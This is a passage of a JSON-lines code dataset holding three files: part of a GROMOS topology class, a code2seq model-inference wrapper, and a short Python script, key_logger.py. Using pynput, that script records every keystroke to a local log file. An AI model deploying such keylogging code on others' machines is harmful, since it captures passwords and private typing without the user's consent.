if(int(self.ATOMTYPENAME.content[0][0]) != self.LJPARAMETERS.content[-1].IAC):\n raise IndexError(\"Missmatch between number of ATOMTYPNAMEs and LJPARAMETERS\")\n\n\n def find_LJparameterNumber(self, C12:float, C6:float) -> int:\n if not hasattr(self, \"LJPARAMETERS\"):\n return 0\n elif self.LJPARAMETERS.NRATT2 < 1:\n return 0\n else:\n for lj in self.LJPARAMETERS.content:\n if C12 == lj.C12 and C6 == lj.C6:\n return lj.IAC\n return 0 # LJ parameter not found\n\n def get_LJparameter_from_IAC(self, IAC:int):\n if not hasattr(self, \"LJPARAMETERS\"):\n raise Exception(\"no LJPARAMETERS block to search in\")\n if (IAC**2 - 1) > self.LJPARAMETERS.NRATT2:\n raise Exception(\"IAC key is too larger than IACs in LJ block\")\n return self.LJPARAMETERS.content[(IAC**2 -1)]\n\n\n def add_new_atom(self, ATNM:int=0, MRES:int=0, PANM:str='_', IAC:int=1, MASS:float=1.0, CG:int=0, CGC:int=1, INE:list=[], INE14:list=[], verbose=False, C6:float=None, C12:float=None, CS6:float=0, CS12:float=0, IACname:str=None):\n if IACname is None:\n IACname = PANM\n \n # Find IAC and (if needed) add a new LJ Parameter\n if C6 != None or C12 != None: #need to find PANM and IAC\n if hasattr(self, \"LJPARAMETERS\"):\n IAC = self.find_LJparameterNumber(C6=C6, C12=C12)\n if IAC == 0: #IAC not found -> add new LJ parameter\n self.add_new_LJparameter(C6=C6, C12=C12, CS6=CS6, CS12=CS12, verbose=verbose, AddATOMTYPENAME=IACname)\n IAC = self.LJPARAMETERS.content[-1].IAC\n if verbose: print(\"New Atomtype with LJ parameters added. IAC found as: \" + str(IAC))\n else:\n self.add_new_LJparameter(C6=C6, C12=C12, CS6=CS6, CS12=CS12, verbose=verbose, AddATOMTYPENAME=IACname)\n IAC = 1\n\n self.add_new_soluteatom(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=INE, INE14=INE14)\n\n def add_new_CONSTRAINT(self, IC:int, JC:int, ICC:float, verbose=False):\n \"\"\"\n adds a CONSTRAINT entry to the topology\n\n Parameters\n ----------\n IC : int\n atom index I\n JC : int\n atom index J\n ICC : float\n constraint length \n verbose : bool, optional\n \"\"\"\n if not hasattr(self, \"CONSTRAINT\"):\n self.add_block(blocktitle=\"CONSTRAINT\", content=[], verbose=verbose)\n self.CONSTRAINT.NCON = 0\n if not hasattr(self, \"BONDSTRETCHTYPE\"):\n self.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=list(), verbose=verbose)\n \n # find the bondstretchtype number or create new bondstretchtype\n bond_type_number = 0\n iterator = 1\n newBondStretchType = blocks.bondstretchtype_type(CB=1, CHB=1, B0=ICC)\n for bond_type in self.BONDSTRETCHTYPE.content:\n if bond_type.B0 == newBondStretchType.B0:\n break\n else:\n iterator += 1\n bond_type_number = iterator\n if iterator > len(self.BONDSTRETCHTYPE.content):#bond type was not found -> add new bondtype\n self.BONDSTRETCHTYPE.content.append(newBondStretchType)\n self.BONDSTRETCHTYPE.NBTY += 1\n self.CONSTRAINT.content.append(blocks.constraint_type(IC=IC, JC=JC, ICC=bond_type_number))\n self.CONSTRAINT.NCON += 1\n\n def add_new_TEMPERATUREGROUPS(self, number:str, verbose=False):\n if not hasattr(self, \"TEMPERATUREGROUPS\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"TEMPERATUREGROUPS\", content=defaultContent, verbose=verbose)\n self.TEMPERATUREGROUPS.content.append([number])\n self.TEMPERATUREGROUPS.content.remove(['Dummy'])\n else:\n if len(self.TEMPERATUREGROUPS.content) < 1:\n self.TEMPERATUREGROUPS.content.append([\"0\"])\n self.TEMPERATUREGROUPS.content.append([number])\n self.TEMPERATUREGROUPS.content[0][0] = str(int(self.TEMPERATUREGROUPS.content[0][0])+1)\n\n def add_new_SOLUTEMOLECULES(self, number:str, verbose=False):\n if not hasattr(self, \"SOLUTEMOLECULES\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"SOLUTEMOLECULES\", content=defaultContent, verbose=verbose)\n self.SOLUTEMOLECULES.content.append([number])\n self.SOLUTEMOLECULES.content.remove(['Dummy'])\n else:\n if len(self.SOLUTEMOLECULES.content) < 1:\n self.SOLUTEMOLECULES.content.append([\"0\"])\n self.SOLUTEMOLECULES.content.append([number])\n self.SOLUTEMOLECULES.content[0][0] = str(int(self.SOLUTEMOLECULES.content[0][0])+1)\n\n def add_new_PRESSUREGROUPS(self, number:str, verbose=False):\n if not hasattr(self, \"PRESSUREGROUPS\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"PRESSUREGROUPS\", content=defaultContent, verbose=verbose)\n self.PRESSUREGROUPS.content.append([number])\n self.PRESSUREGROUPS.content.remove(['Dummy'])\n else:\n if len(self.PRESSUREGROUPS.content) < 1:\n self.PRESSUREGROUPS.content.append([\"0\"])\n self.PRESSUREGROUPS.content.append([number])\n self.PRESSUREGROUPS.content[0][0] = str(int(self.PRESSUREGROUPS.content[0][0])+1)\n\n def get_mass(self) -> float:\n \"\"\"\n Calculates the total mass of the solute molecule\n\n Returns\n -------\n float\n total mass in a.u.\n \"\"\"\n mass = 0\n if hasattr(self, \"SOLUTEATOM\"):\n for i in self.SOLUTEATOM.content:\n mass += i.MASS\n return mass\n \n\n \n\n","sub_path":"pygromos/files/topology/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":28748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"583230350","text":"import os\n\nfrom torch.utils import data\nfrom pycode2seq.inference.parsing.utils import read_astminer\nfrom typing import List, Tuple, Dict\n\nimport torch\nimport numpy as np\n\nfrom code2seq.dataset import PathContextBatch, PathContextSample, PathContextDataset\nfrom code2seq.dataset.data_classes import ContextPart, FROM_TOKEN, PATH_NODES, TO_TOKEN\nfrom code2seq.model import Code2Seq\nfrom code2seq.utils.converting import strings_to_wrapped_numpy\nfrom code2seq.utils.metrics import PredictionStatistic\nfrom code2seq.utils.vocabulary import Vocabulary\nfrom omegaconf import OmegaConf\nfrom torch import Tensor\n\nfrom pycode2seq.inference.language import Language\nfrom pycode2seq.inference.model.labels import LabeledData, extract_labels_with_paths\nfrom pycode2seq.inference.model.loader import ModelLoader\nfrom pycode2seq.inference.paths.extracting import ExtractingParams\n\n\nfrom code2seq import utils\nimport sys\nsys.modules[\"utils\"] = utils\n\n\nclass Model:\n models_gdrive_file_ids = {\n \"kt_java\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"java\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"kt\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"kotlin\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\"\n }\n\n multi_models = [\"kt_java\"]\n\n @staticmethod\n def load(name: str) -> 'Model':\n save_path = ModelLoader.model_path(name)\n os.makedirs(save_path, exist_ok=True)\n\n model_path = os.path.join(save_path, \"model\")\n config_path = os.path.join(model_path, \"code2seq.yaml\")\n vocabulary_path = os.path.join(model_path, \"vocabulary.pkl\")\n checkpoint_path = os.path.join(model_path, \"model.ckpt\")\n\n required_files = [config_path, vocabulary_path, checkpoint_path]\n\n if not all(os.path.exists(file) for file in required_files):\n print(\"Downloading model\")\n ModelLoader.load(name, Model.models_gdrive_file_ids[name])\n\n return Model(config_path, vocabulary_path, checkpoint_path, ExtractingParams(8, 3, 200), name)\n\n def __init__(self, config_path: str, vocabulary_path: str, checkpoint_path: str,\n extracting_params: ExtractingParams, model_name: str) -> None:\n self.config = OmegaConf.load(config_path)\n self.vocabulary = Vocabulary.load_vocabulary(vocabulary_path)\n self.model = Code2Seq(self.config, self.vocabulary)\n\n self.model.load_state_dict(torch.load(checkpoint_path, map_location=torch.device('cpu'))[\"state_dict\"])\n\n self.device = torch.device(\"cpu\")\n self.to(self.device)\n self.model.eval()\n\n self.extracting_params = extracting_params\n\n self.model_name = model_name\n self.default_lang = None if model_name in Model.multi_models else model_name\n\n def to(self, device: torch.device):\n self.device = device\n self.model.to(self.device)\n\n def _prepare_batches(self, file_path: str, language: Language) -> Tuple[List[PathContextBatch], List[str]]:\n root = language.parse(file_path)\n data = extract_labels_with_paths(root, self.extracting_params, language.split_on_methods)\n method_names = [d.method_name for d in data]\n batches = [PathContextBatch([self._labeled_data_to_sample(method, 200, True)]) for method in data]\n\n for batch in batches:\n batch.move_to_device(self.device)\n\n return batches, method_names\n\n def methods_embeddings(self, file_path: str, language: str = None) -> Dict[str, Tensor]:\n language = language or self.default_lang\n if language is None:\n language = file_path.split('.')[-1]\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n with torch.no_grad():\n embeddings = {}\n for batch, method_name in zip(batches, method_names):\n encoded_paths = self.model.encoder(batch.contexts)\n\n # [n layers; batch size; decoder size]\n coded_batch = [ctx_batch.mean(0).unsqueeze(0) for ctx_batch in\n encoded_paths.split(batch.contexts_per_label)]\n initial_state = (torch.cat(coded_batch).unsqueeze(0))\n embeddings[method_name] = initial_state.squeeze()\n return embeddings\n\n def run_model_on_astminer_csv(self, data_path: str, language: str) -> List[Tensor]:\n # data_path -- path to folder with generated csvs\n data = read_astminer(data_path)\n batches = [PathContextBatch([self._string_to_sample(method, 200, True)]) for method in data]\n\n for batch in batches:\n batch.move_to_device(self.device)\n\n with torch.no_grad():\n return [self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0]) for batch in batches]\n\n def run_model_on_file(self, file_path: str, language: str) -> List[Tensor]:\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n with torch.no_grad():\n return [self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0]) for batch in batches]\n\n def _run_model_on_file_with_metrics(self, file_path: str, language: str):\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n results = []\n\n with torch.no_grad():\n for batch in batches:\n logits = self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0], batch.labels)\n prediction = logits.argmax(-1)\n\n statistic = PredictionStatistic(True, self.model._label_pad_id, self.model._metric_skip_tokens)\n batch_metric = statistic.update_statistic(batch.labels, prediction)\n\n results.append(batch_metric)\n\n return results\n\n def _string_to_sample(self, data: str, max_contexts: int, random_context: bool) -> PathContextSample:\n str_label, *str_contexts = data.split()\n if str_label == \"\" or len(str_contexts) == 0:\n print(f\"Bad sample {data}\")\n return None\n\n # choose random paths\n n_contexts = min(len(str_contexts), max_contexts)\n context_indexes = np.arange(n_contexts)\n if random_context:\n np.random.shuffle(context_indexes)\n \n parameters = self.config.dataset.target\n\n # convert string label to wrapped numpy array\n wrapped_label = strings_to_wrapped_numpy(\n [str_label],\n self.vocabulary.label_to_id,\n parameters.is_splitted,\n parameters.max_parts,\n parameters.is_wrapped,\n )\n\n context_parts = [\n ContextPart(FROM_TOKEN, self.vocabulary.token_to_id, self.config.dataset.token),\n ContextPart(PATH_NODES, self.vocabulary.node_to_id, self.config.dataset.path),\n ContextPart(TO_TOKEN, self.vocabulary.token_to_id, self.config.dataset.token),\n ]\n\n # convert each context to list of ints and then wrap into numpy array\n splitted_contexts = [PathContextDataset._split_context(str_contexts[i]) for i in context_indexes]\n contexts = {}\n for _cp in context_parts:\n str_values = [_sc[_cp.name] for _sc in splitted_contexts]\n contexts[_cp.name] = strings_to_wrapped_numpy(\n str_values, _cp.to_id, _cp.parameters.is_splitted, _cp.parameters.max_parts, _cp.parameters.is_wrapped\n )\n\n return PathContextSample(contexts=contexts, label=wrapped_label, n_contexts=n_contexts) \n \n def _labeled_data_to_sample(self, data: LabeledData, max_contexts: int, random_context: bool) -> PathContextSample:\n return self._string_to_sample(str(data), max_contexts, random_context)\n\n def _get_label_by_id(self, id: int) -> str:\n return list(self.vocabulary.label_to_id.keys())[list(self.vocabulary.label_to_id.values()).index(id)]\n\n def prediction_to_text(self, prediction: Tensor) -> str:\n ids = prediction.argmax(-1)\n return \"|\".join([self._get_label_by_id(id[0]) for id in ids])\n","sub_path":"pycode2seq/inference/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"193020179","text":"import pynput\nfrom pynput.keyboard import Key, Listener\n\ncount = 0\nkeys = []\n\ndef on_press(key):\n global keys, count\n keys.append(key)\n count += 1\n print(f'{key} is pressed')\n if count >= 10:\n count = 0\n write_file(keys)\n keys = []\n\ndef write_file(keys):\n with open ('log.txt', 'a+' ) as f:\n for key in keys:\n no_quotes_key = str(key).replace(\"'\",\"\")\n if no_quotes_key.find(\"space\") > 0:\n f.write(' ')\n elif no_quotes_key.find(\"Key\") == -1:\n f.write(no_quotes_key)\n f.write('\\n')\n\ndef on_release(key):\n global keys\n if key == Key.esc:\n write_file(keys)\n return False\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n","sub_path":"Python/key_logger/key_logger.py","file_name":"key_logger.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}